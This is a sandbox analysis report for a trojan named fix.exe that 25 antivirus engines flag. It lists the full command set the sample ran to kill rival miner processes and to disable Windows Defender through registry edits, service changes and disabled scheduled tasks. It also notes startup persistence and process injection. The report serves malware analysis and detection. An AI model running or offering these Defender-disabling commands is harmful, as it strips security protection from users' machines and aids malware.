Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 14, 2021, 6:14 p.m.	April 14, 2021, 6:16 p.m.

Size	90.0KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`025e0b547c344ac713a7284e17feaca7`
SHA256	`448c916483d9a19490c29bbd8286ff297d8fa1828f5626deebc82ea605e66928`
CRC32	`3D72BB4C`
ssdeep	`1536:o7f9h0UPJP/CpICdikMLMLv5PFNg1qrX+VIOlnToIf7gIxsV3M3aOn:mliUPXC8k1nJrX+fNTBfnyM3Z`
Yara	PE_Header_Zero - PE File Signature Zero win_files_operation - Affect private profile IsPE32 - (no description) IsWindowsGUI - (no description)

fix.exe "C:\Users\test22\AppData\Local\Temp\fix.exe"
7092
- cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe"
  2864
  - taskkill.exe taskkill /F /IM ati_service.exe
    4636
  - taskkill.exe taskkill /F /IM sihost32.exe
    3800
  - taskkill.exe taskkill /F /IM sihost86.exe
    2848
  - taskkill.exe taskkill /F /IM sihost64.exe
    8400
  - taskkill.exe taskkill /F /IM nslookup.exe
    7772
  - taskkill.exe taskkill /F /IM MSVSCService.exe
    7532
  - taskkill.exe taskkill /F /IM mscvs.exe
    5272
  - taskkill.exe taskkill /F /IM test.exe
    1036
  - taskkill.exe taskkill /F /IM VSC_Host_Service.exe
    3320
  - taskkill.exe taskkill /F /IM darkgenerationminer.exe
    4104
  - taskkill.exe taskkill /F /IM nslookup.exe
    7184
  - reg.exe reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
    5704
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
    1032
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
    7276
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
    6584
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
    6316
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
    6848
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
    5176
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
    5012
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
    1536
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
    4472
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
    5676
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
    6188
  - reg.exe reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
    4428
  - reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
    2316
  - reg.exe reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
    5252
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
    2364
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
    5520
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
    3824
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
    8844
  - schtasks.exe schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
    8520
  - reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
    5052
  - reg.exe reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
    7996
  - reg.exe reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
    5128
  - reg.exe reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
    4020
  - reg.exe reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
    2744
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
    2708
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
    2592
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
    2180
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
    1844
  - reg.exe reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
    1136

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
172.217.25.14	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (16 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 14, 2021, 6:07 p.m.	computer_name: TEST22-PC	1	1

Command line console output was observed (50 out of 308 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: taskkill console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: /F /IM ati_service.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: taskkill console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: /F /IM sihost32.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: taskkill console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: /F /IM sihost86.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: taskkill console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: /F /IM sihost64.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: taskkill console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: /F /IM nslookup.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: cd console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22 console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: audiodg.exe /a:h console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: Could Not Find C:\Users\test22\audiodg.exe console_handle: 0x000000000000000b	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: hostcomutative /a:h console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: Could Not Find C:\Users\test22\hostcomutative console_handle: 0x000000000000000b	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: ati_service.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: Could Not Find C:\Users\test22\ati_service.exe console_handle: 0x000000000000000b	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: smssmanagment.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: Could Not Find C:\Users\test22\smssmanagment.exe console_handle: 0x000000000000000b	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: nslookup_service.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: Could Not Find C:\Users\test22\nslookup_service.exe console_handle: 0x000000000000000b	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: del console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: nslookup.exe console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: Could Not Find C:\Users\test22\nslookup.exe console_handle: 0x000000000000000b	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: cd console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: AppData console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22\AppData> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: cd console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: Roaming console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: C:\Users\test22\AppData\Roaming> console_handle: 0x0000000000000007	1	1
WriteConsoleW April 14, 2021, 6:07 p.m.	buffer: cd console_handle: 0x0000000000000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.code

The executable uses a known packer (1 event)

packer

PureBasic 4.x -> Neil Hodgson

Creates executable files on the filesystem (1 event)

file	C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk

Creates a suspicious process (6 events)

cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe"
cmdline	schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Executes one or more WMI queries (10 events)

wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sihost32.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "MSVSCService.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "test.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sihost64.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "sihost86.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "ati_service.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "darkgenerationminer.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "nslookup.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "mscvs.exe")
wmi	SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "VSC_Host_Service.exe")

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
ShellExecuteExW April 14, 2021, 6:14 p.m.	show_type: 0 filepath_r: C:\Windows\sysnative\cmd parameters: /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe" filepath: C:\Windows\sysnative\cmd	1	1	0

The binary likely contains encrypted or compressed data indicative of a packer (3 events)

section

{u'size_of_data': u'0x00003400', u'virtual_address': u'0x00012000', u'entropy': 7.110235506298322, u'name': u'.rdata', u'virtual_size': u'0x000033a0'}

entropy

7.1102355063

description

A section with a high entropy has been found

section

{u'size_of_data': u'0x00001600', u'virtual_address': u'0x00018000', u'entropy': 7.694836126735778, u'name': u'.rsrc', u'virtual_size': u'0x00001584'}

entropy

7.69483612674

description

A section with a high entropy has been found

entropy

0.207865168539

description

Overall entropy of this PE file is high

Checks for the Locally Unique Identifier on the system for a suspicious privilege (11 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 14, 2021, 6:07 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1

Yara rule detected in process memory (12 events)

description	Affect system registries	rule	win_registry
description	Affect system token	rule	win_token
description	Affect private profile	rule	win_files_operation
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (42 events)

cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
cmdline	taskkill /F /IM sihost64.exe
cmdline	taskkill /F /IM darkgenerationminer.exe
cmdline	taskkill /F /IM MSVSCService.exe
cmdline	taskkill /F /IM sihost86.exe
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
cmdline	C:\Windows\sysnative\cmd /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe"
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
cmdline	taskkill /F /IM mscvs.exe
cmdline	reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
cmdline	taskkill /F /IM test.exe
cmdline	taskkill /F /IM ati_service.exe
cmdline	reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
cmdline	taskkill /F /IM sihost32.exe
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
cmdline	taskkill /F /IM VSC_Host_Service.exe
cmdline	reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
cmdline	taskkill /F /IM nslookup.exe
cmdline	reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
cmdline	reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
cmdline	reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
cmdline	"C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\FE9C.tmp\FE9D.tmp\FE9E.bat C:\Users\test22\AppData\Local\Temp\fix.exe"
cmdline	reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
cmdline	schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Resumed a suspended thread in a remote process potentially indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 7092 resumed a thread in remote process 2864
NtResumeThread April 14, 2021, 6:14 p.m.	thread_handle: 0x00000204 suspend_count: 1 process_identifier: 2864	1	0	0

Creates known SpyNet files, registry changes and/or mutexes. (1 event)

registry

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\SpyNet

File has been identified by 25 AntiVirus engines on VirusTotal as malicious (25 events)

Bkav	W32.AIDetect.malware1
Elastic	malicious (high confidence)
FireEye	Generic.mg.025e0b547c344ac7
Cylance	Unsafe
Sangfor	Trojan.Win32.Save.a
Cyren	W32/Trojan.IUNU-0892
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	BAT/KillAV.NFF
APEX	Malicious
Cynet	Malicious (score: 100)
Kaspersky	Trojan.Win32.Agent.xahlxv
Paloalto	generic.ml
McAfee-GW-Edition	BehavesLike.Win32.Generic.nh
Sophos	ML/PE-A
Jiangmin	Trojan.PowerShell.ev
Kingsoft	Win32.Troj.Agent.(kcloud)
Gridinsoft	Trojan.Win32.CoinMiner.vb!s1
Microsoft	Trojan:Script/Phonzy.A!ml
Acronis	suspicious
Malwarebytes	Trojan.AVKill
Zoner	Trojan.Win32.73853
Rising	Malware.Heuristic!ET#100% (RDMK:cmRtazqvTOj24YHY3fvo4PROTNRA)
Cybereason	malicious.126be5
Panda	Trj/Genetic.gen
Qihoo-360	HEUR/QVM05.1.92E2.Malware.Gen

Disables Windows Security features (13 events)

description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting\DisableEnhancedNotifications
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine\MpEnablePus
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SubmitSamplesConsent
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\DisableBlockAtFirstSeen
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet\SpynetReporting
description	attempts to modify windows defender policies	registry	HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
description	attempts to disable windows defender	registry	HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start

Stops Windows services (5 events)

service	WdNisDrv (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisDrv\Start)
service	WdFilter (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdFilter\Start)
service	WdNisSvc (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdNisSvc\Start)
service	WdBoot (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WdBoot\Start)
service	WinDefend (regkey HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start)

fix.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All